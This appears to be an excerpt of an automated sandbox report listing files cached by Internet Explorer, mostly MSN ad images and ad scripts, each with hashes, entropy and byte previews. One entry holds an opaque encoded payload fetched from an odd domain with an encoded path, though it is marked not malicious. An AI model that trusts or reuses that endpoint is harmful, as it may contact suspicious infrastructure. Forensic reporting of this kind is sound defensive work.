SHA-512:	2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......\|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....\|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..\|>..n4...2.57........f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\aae24b5e-4222-45c5-92e8-af9555bcd2ec[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	75156
Entropy (8bit):	7.971878463034035
Encrypted:	false
SSDEEP:	1536:KVncdRFlf2eguBV/lSpDRiZQPQLGnVh2HHhs9fKP3/UqRnthtQvfEw4Kr0IsEHM:KBcdvp2Abt0VkIVQhsQvcqRtDQ3EwdsZ
MD5:	8E10998DFABC9D04538ACD6154846DA3
SHA1:	EEB5C9C2E2C9FCC1A4508B62757AC743D33BBFFD
SHA-256:	B5C72134257B9A2344466C013FF443CBF704BBDBBE7D99633EAD9FA4535A7E28
SHA-512:	4CE087F73825811F7FD4BD1C93322B5A64CA42544801C928E51E3F66038E5AD896D16A6E3AD6DB5BF993AB84A478C98D326F75B4349C866A54DC5A21876D3444
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/2/9/137/138/aae24b5e-4222-45c5-92e8-af9555bcd2ec.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................I...........................!...1."AQ.#2a.q..B..$3Rb.....%Cr..&4S....5D....................................A.........................!1.A."Qa..q2......#B...R..$3b...Sr4E.T............?.........I..U.a...F..S..d....i.6E....{..i.TUDk........x....'%8..1Pm..?X..ET..[..r....h.......TH....9.{H...s...Wj7\|..e...g...$$..B.X.}......g#....v....=..~8.0Ic.=YQ..V.F.z1....../...5#..2+.#.NN......'.5.>.^7.3.."..}[g...F.W+.....3n.9.D.......s...+...!l.<e..Sm..r...#...xT]UAT...bv...m.......p(W....$...6.N..h....m.....{..D..3.N.#_..U.._..v....i.X^5,..1"9.E..Y.EV..#...j..F......SL......C../+.ED^.E.O.{....\|..&...N.n...>..\|.6.L...V.{X\..6..{.......W~.N.u......[..=...TUD..'}/.o....._)..-......^.r..F.._...uz...CvF.z.u1.r9....TN..U.....$.P..F.4$\.F...k....C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\adb3478e-c94c-4cdb-9882-fa384ccec861[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	86424
Entropy (8bit):	7.979519378625907
Encrypted:	false
SSDEEP:	1536:oXVk5kODvwkyh626qFydrCrE8rxd5mvXlz3QqlAXoX+wkrRsZtAVl:oXVk5hYkyhtzFy3O5WlrDlAw+FEAVl
MD5:	D3CFBC30017E38E6EEEBADEDFD8A3503
SHA1:	A9E354219DB237A4C0632B203C2260DDB977F5F1
SHA-256:	2F3719AD8F485C5B7244E36693E03A942EA6AAC5B0F17E88718881C3F480D64A
SHA-512:	6C74FE3FF4301C78C29119FF0BCCD19893003236C1DDBA229292F181C3CD6017AD23C72FA57F56B4C6800EB0004896AA3319117426378BBD95A45955736F95D6
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/178/41/161/adb3478e-c94c-4cdb-9882-fa384ccec861.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................B.............................!."1.#A.2Q.$a3B.q.%4R....Cr....&S....................................A.........................!..."1.A#2Qa..q.$3BR......C...%ESbc...............?...=..Q%..c.....%<\|....1....U/.._........_#...\|......s....T0..J....D......D@.....%H...s a.].?0q0233<...G..q...w."......a....<{..NBEl.9d....f.Fc....?....7EWRj.b..u.O.....=..\|wq=..??....}.r.\..[PO...... .'......f.k.f....3.e.8........&9..._.._m.....K.\|........i.K..b.J\|.)..c..........b#.......\\|..?.._3?l..........<X..v8.aL6.].........8....._p!K...q1 P>NFf#......................~....x..r4.......xbNNV...{.O.{.....8....li.l.....DfR.T2yi.\|}.......33..}G..u.>.'.ri[hT..G.kX..\@..wp-..8.............J......r.%.1>......c..Y.Y.....<.._.......\|k...E.A'.m.k_.......j.8[..E.......!.g...~>~fb}-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301467861497523
Encrypted:	false
SSDEEP:	384:2MjAGcVXlblcqnzleZSug2f5vzBgF3OZO4QWwY4RXrqt:p86qhbz2RmF3Os4QWwY4RXrqt
MD5:	73455F3084C7DE1D4CCBA2D73F6CBA70
SHA1:	E12E181AFD2F73C896957919C3D0DF4254DDCC7B
SHA-256:	8050E2D5597F872F3514B304C42E0A378F6B54060A2CA93A83D726250D65125A
SHA-512:	78A2A14326FFE60D50E3F0EED2D3C9A6F109185C8A943C075A8953C3E7C22BDB48736DE1F832F0AA85FC29B083AD1CF5613E5FE841309FA5234E58BBBA980467
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\dA0aOC4[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340064
Entropy (8bit):	5.999861206284018
Encrypted:	false
SSDEEP:	6144:JIRX8egUYt9OT0ijXuuBm3l5KQo9uUCFhYK7pdFT2DYdwYc08SsVH:JIh5gnwT04Dm3PG9unF6GX4DGq6sJ
MD5:	10FBC9D242FD8CD959FF426E4B62FBE6
SHA1:	72B6C613DCB5A501AA0F7AE15F3BD78627197C9B
SHA-256:	EC909CEE0478B6ED5C79D68B6DDD8CC80B5B707E5F74421980A475812BCBF069
SHA-512:	0CEC539006C6997E80436BA6090B3D0926DCD1031BF761482685E8A9B2C718C29B14A41EAF3EBEA40E1BD2F0945A384FDFE2460334316E05DD52812D9EEA2306
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4
Preview:	Jqhw2IavH8gZkhpcFrw1OLJBaU3JjzLdiA1RGDIRYDgU07YCjPuaB/bxTrBsjXh3SRTqeWes0lsYe+xeTCZoewfQSITdInGuCSyC+BM8izF19niprBwDmtq9Dpq43wqO5mT5wSWfZVgh9/vOjtuke72F3X2y8PNEshnUZSnVHXxlBWcSP59gSAEOiKj1eIPaPdFm9ThzRWlP0N3Y+nFSrJpbBs9Rfw9ueBfOTBZs15IZYX+RrdNFAqlh1x4wRa7jloacgXHC77xIO2TK+ofYKa9o10L+mWzxctg8rOl0KwmZkvzjdI+3eu+0jgqftO6jVPsBoDwxGUjwt3ofq5eee/X+q41KwH9afWCt0m0CidoYvIGIFgMGfhYniRSNgSJf92cZ55KKq15fO7CdupMB1IeiXcUeP39vl7vl1a4vQMe/gDQdZoZci9hbDWipAuGKFxx3rYxAep8hqVlV+KUBfn3XWKRfXcs/P0gZWLFQoJ9ah/TMBHOyVX70/kHv39iAiGg42udHX7tergSmifF4pSQ3LGSwniWbo78VCa7OTTIcGpCq6ZNjG751UcISxcWrGVZY6FCtVfWTqfZPbuZUOHV0RmTgyxfrnDDFTgPtyWuzAWK9aqPVqX+GDynkmmHTOT8ri9BhqfCssEc3JeyONyy9I6RvTtYRoTC8eeWUGuU4bRWF03LPUc/w/ttQgFpwg2EvkRRaLpu/V2P6PiLsROsGcDgMsNH+Dc2HpUMbGLtbA5+j3t9EmwpsbXGYD3MJBmRbXtkSdotAC9p2195oBKIBHFOJbgIIpD3eZES5HiGYNddREUByxgzNQEATb2HXAFpy0cOgBa4PjnqtQj1d9jSuzyviZM0yeFvLWTPHSjzw5Izr3vHCy11LpnyMzQmRLbyKsE7l5KqxjhRpe9OQ+JIAWsFFoYgYkVET6DSoRm8XWqkblYTlky5l1/1foE4WcWQmOt+hUWGLAY3bTgxd1+TQLKY8UPjIdJ8ZkWSk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	37858
Entropy (8bit):	5.078135233541778
Encrypted:	false
SSDEEP:	768:01av44u3hPPoW94hZEtCSA1PkpYXf9wOBEZn3SQN3GFl295oolEf/wl6sA:EQ44uRYWmhWIZPkpYXf9wOBEZn3SQN3w
MD5:	1151BB7A9C3965AF026D4E366E1A6E10
SHA1:	AE6FEE052DB18C0BB36C90B6207C58DCBCB799E1
SHA-256:	38571CFDD9BB56C640A6B01B8CAA0ED46E6249F2B3BF0AC89FD54CB97C2D073C
SHA-512:	BE7593D42E99DA1896C8C8140278B7B7D5BEC2F28273AF637E26B775F384BA9DDA44A0E401212C68FE5822CBC348AF524EF54BC432DE5DA675D5B15A3E1CB757
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611686653747454981&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1611686653747454981","s":{"_mNL2":{"size":"306x271","viComp":"1611685423736335499","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886934591","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1611686653747454981\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_06326605864354eef8d69459f54ecc0c[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	14949
Entropy (8bit):	7.863128761513647
Encrypted:	false
SSDEEP:	384:BYNg7sHt+POQR5J1yEEpn8jbHsUIor4d57wvuBlD:BYyoWhD1yh8jLs0cL7wvuBlD
MD5:	4CCD5894127614E408DEB8BDBF0051B9
SHA1:	B8F3DF4C91750EFE08A455A9733EF77633B09359
SHA-256:	DEAAE85FE55DD154DFEE16A701623B4FA7E5619C1C09B87EAC3EF9FDABCD9038
SHA-512:	9F1DA6AEADF58A0E5D30B787BBC1BCBCC2D57A6ECFEDD6F87BB2B89C57F6B563D29ACC917DC9292234E3C46A4CE8123CCCD600FD4A641251980BEB22A33EC01D
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_485%2Cy_402/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F06326605864354eef8d69459f54ecc0c.jpg
Preview:	......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_29548775a473a2c67add94fd55354025[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	25412
Entropy (8bit):	7.978955001316793
Encrypted:	false
SSDEEP:	768:UL5KG0yD6Hspb63cNHn/shXTbHzhBCs50PekmrfvKr:UL5oKkib6an/YnTCs3kSC
MD5:	C7B0CF3FD64312888F4783ED2FE4B589
SHA1:	59A8235A5B2B7123123F1EBB598FF616CF842742
SHA-256:	8D1B0C4F3830719A588E0A54E4A84692C3584A634A125998E3647E50CC5763AF
SHA-512:	EFEA257EB0671535E932F9DDDEB74976993FA105D1D7162A91BDBF88EECD25F7713FCBDBC8AE6B153C0500D069A7FF660DF986980BB8E87B333F674F5C3E0D8F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F29548775a473a2c67add94fd55354025.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............6..................................................................cZ.../...8~.........C!....a.4...L......... ..1..!..x...@B8..G..5...f....Q.....@L..<.. a.dF.`d.......f.x..F..x<. L...#!...2.g.6...h..vx.`@.4Y.S.<.. )`f.a..e.a.J0....3...ww....c.....(..FC..1.f..c..Z..p.=^a#...(....,.w.`).....#.`H`<3D...}V...u8.......W..T.'7.......o.p...........f.pD...hW;../.......Km...S...k..w.0..`.k..@.3.E.^.i.b.\|V.O..4..L...0hq.U.).ih{.,...]... ....!.d<.0....SQ.......J.....{.z<.o^f....G[.e..l...{Q.V..w`Xd....`...98...U........^.XK.'v....I.L..>...sV...z..2....)....U....\|.~..I...TMS..S.%.h...{./.9.L.0..j]..p...9k..q..T^...V1...g.6.*#..e\..zhb.~.\:.l....)J.....".t.P".85...k.4%j.....f,..8.....l...e..+.DO...iK.J.........if.....d.z.zeM..Js.....=...W.I..4.9u.\.Kd..}5Fb...K.7....c..Xr.S. .j.....Y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_7b70df30498d02146a2524fb6a92a25e[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	25944
Entropy (8bit):	7.955281592220118
Encrypted:	false
SSDEEP:	384:eeCY3/d9nlzmw36wzCvHsw8KDfmNw7xPVIapjIxYWG47RYu7hog:ZCW3Mw3zz8sj8+NPwjIxYyT+g
MD5:	0CC2FD8A6053381AA789B189275E2262
SHA1:	41E1A824AA743DD2D69009172B5363A9E05A0822
SHA-256:	5917A3FDA3D0A0DD87EB485847D742FDBF8587471A3B2CF6C529D9D213EA39F2
SHA-512:	E1F12806B2FDC00835E3168E93BDE9C6B5A6694E804CB848842ED611AC3C7217E963F8336F0CCFE79F1A0B98E607F3C063A8C444D1D97F8007F322E5A136685F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F7b70df30498d02146a2524fb6a92a25e.jpg
Preview:	......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...\|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....\|.i.}...0..................................................&....&,%#%,5//5C?CWWu......................'.....'<%+%%+%<5@404@5_JBBJ_m\W\m.vv.............7...............5..................................................................k. .&.C......=G `...v....v....=.C......o5..).........a......z..@.(.1`.>.tI3....-.+&d..=...b.b..p..4x....3..=.C.!..n....H.bv....Qn.>.....a.t....2A...." .4?.t...(i....m.......p.d.%.Y..\|....9&.d.G.h.....`..e.-5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_8e6ab93656458bf8c68a4c551f4dc3fe[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	22471
Entropy (8bit):	7.979258288189648
Encrypted:	false
SSDEEP:	384:wWXW6bne9c0RzV8N4FWBy1xr81D3PlZaKFbs/43DbzRBHpI4MIbz2YZoyfx7B/hn:dX5K9piN4FWB2EDN0us/43PdPHMmhxdP
MD5:	9AC6B582E43B01C9FFCF8B3E27932589
SHA1:	88EC572FD8EC345C1F9E85CA0FA020B38448267B
SHA-256:	AE79D1B04100620CE96BBA86FD30A32971967EFBFD1125A23AE6A8AE8D788BF2
SHA-512:	A5EA6FCD1A9FA9F5D8F47623C6AEF1C7D03EE00B58B7D66AE6C165403781D93DE6299E2BB951C6F070DA701818C4838BBCD4C4DA4B5E6109C5B3B57F93E80F77
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F8e6ab93656458bf8c68a4c551f4dc3fe.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............5..................................................................>....HvS..N.rW..8zW..3G)..=e..dK.......a.C.c.....jF...Wy...k5..pA........8...`.B.4.Q._.(..A....Ja.JC.Ja..( ".....HQe ..N.T(qTS...A.j..!E.p(P...9H5Q.0Q...j..0P..U!`.U. ....\..R..vk.0..0QE.\...U.....A..s..T!.pqpj.L.S..p5h..A...i.0.B.P.D..R.~W..FhQ.6......z..o=U....m...........A..Q.......\|^..^k\|..k..m.......:...b...X.,....x.cv>5..9s......G..<}...x.N=.]\|.....5......s..o..B.,.W.#.q]x..rD-c..M..B..r..V.w.siq.u..Mb...c.....m.=...<...S..z+...G.H%U..+;......g,.j..}.hY....\|.....j...p.[,........{/...Y.....^V.>..0t....n:..T.7'.N.:....p..g.).t_.-.....\|...m..'...F..<.....g{K=...^'\|...}....4.>..W.......9.N......nx....w.......0.l.iW.>.G>....y...%....y....:C..S........j.F.,...Y."..g.....=>.....%..4....\|......W..j....\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_9de64e087342a200ccd3882b3b32d7d2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	18774
Entropy (8bit):	7.96751334833658
Encrypted:	false
SSDEEP:	384:Ul8EDZnIUedTMSU6cDtiwxFWWvoBInw40OuRkczFME2dTUs1lQuqR1ucqQvKDc:V+IUATMS5kptw+wXhznSkuk1QY
MD5:	05B4A297E73C337674A3C8D3B7AA82C7
SHA1:	25AABF7D59469C66D8516E8B64A9626A33F7B78C
SHA-256:	53846C7722CD41AF0D326E996C2BC72E7778DFFF2D08B6946BAF93DF327D170B
SHA-512:	6474E84A47C4948BE87F678A9A63762CAAA6F76A10966D8CEE6216DFE258740431891AF2D7492E114197FCA6D4D344EB7EF5E3A2E1A5A92EDA16D0132480C6C8
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F9de64e087342a200ccd3882b3b32d7d2.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............4................................................................O..F.6.A.B..0............+...1. ..0..1AQAAQAQaAaR.0...A..A.(...........]...a..... ..E....E......A..A..a.l1AAQQQAAAQhT....Z..w\.v....t.D..5.5....eRW.eAQQB....../...9.\...Lm.7..Z..Y.k5.V..,]W=..K...B.....v..7>..=K..9..}1..>....YLN...R..%....c.Vm....H.d.0...#.4.~.l..r....eJ.d~..T..W.n.TF.p....A.ZvYij.~f.5..h.ni...(..V..Q:....1.J...[.j..(.e...G...i._nc].V..S6d.]K.7.0.Be..3...zW..d.u..YXn...IQ......,...Y. ...H)e..3^...{>....G...l.....X%c:..r.J....c..y.Y..zv,.....C.J..Ip.C).h+.f.....w,....dpa.A,....Z.W+'eq..c......0.T.TP...R.V...E..)..[.WS.[VZsY.......8.....q....../...w,.)..Tk<..T..&.....M.Ch.JC.9.."t..`....^k<..N[#.]."$}...P3pb..1W."&.F..WQ...%.Ca>........h...Q@0./(.K.=..+.f"..Z...(CIr....E.v.'!...H..Vr..U.W..$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_aff6bfc1c6c4f2caccde3859baf539e3[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	12437
Entropy (8bit):	7.94903071451543
Encrypted:	false
SSDEEP:	384://qOY9l+/oCOraPqkdaMvusAHN8A32xE+w7Nk4xu:nLYGwCRqlDs0N8Ame+Iu
MD5:	C714712584AA27AB5D14D646823373E9
SHA1:	2633898CDEC8A363D1AAE600D4F841D4C4E6693F
SHA-256:	B3BF62BA5E352A3C8EA2E265903AE2CCB18806F73622B83C377E2B254CE004D1
SHA-512:	CCF2F64C68F32C4D48C2DCB851C6243F0B0336533851EE8CE304F90B9D29EB9092F5DC12D0052E9E9C41BA1BF0C38E8F8156EC14A6A6E9D627B2DB15E4D5D17F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faff6bfc1c6c4f2caccde3859baf539e3.jpg
Preview:	......JFIF.............C....................................!$..( ..%2%(,-/0/.#484.7./....C.......'..'S7/7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS......7......................................................................................Db.4y .3..4p.Q.I.....4...A.<8i.... .....xh.....(.!...xh..4a1)....<8a.B!......8.i I....'.H)..F..DF .D#.(X......Lx,..."..!.D4`....q..8A!0...'.)..P Ppr!...8.`.........b.<f.T...F0....A..I....+......h.3.h)Z....4..@.p..piJi..L..[.KP2.......!&<<(((......"3.!..k1..k.Qj...`R...q.0I!n}"^..cH\...a.F...{.].9..Fg..r..%,@...Ate...4....+...nf.c..e`......3F........<Jx.1T.....dM.."......k.tm..f.9...D...W..c.q5..d..y.(..ydl.2m..f..J.Lx...R(...,.m1e..)Jb..../..j..g..@F.(P..8.r...}./.,..E1C5...B.\..;.:@.ICO....4..k....w.0.......2\........O..1.>.3.B&.....0.+.../..?X..R<DR.e4........^]..fwQMQh4,..R..D.g....;f.t.e..JL...\.F....o...&.7..P6....8@"..SKZi.o...Zs...8..:a...E.G....K.bv..N.0 ..3.{.....g)..V.V.R.. >....\*v.-..\..A`.+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_b4ca77dbdddcdc3d5aeaaab8225e9263[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	20944
Entropy (8bit):	7.97616967903083
Encrypted:	false
SSDEEP:	384:rDWcJ7b1GWf09eeVuLsqkcJ5ipQZzV3L/j2WKZWGV972urAzntVVju:ricFbtf09e6QssJ4pQZzV3GWKh2eqVBu
MD5:	4A9D3484D588364E0D35F3B57A56A197
SHA1:	6A21AC574C361529CBFC305A8E57285986888A84
SHA-256:	A1E87428AAA46C69760C31ECD6AA8530D9EB85BF1B6073AA790397C5E5A510FF
SHA-512:	9BE976CE1EA26E0F561148118EB4F7615A168EAFFC0193D3B9D43C2ABB145E47BD925B233BBA6F8C842892D1443B0C0097E922FFC2E2E63A69DE1492ABFCC158
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb4ca77dbdddcdc3d5aeaaab8225e9263.png
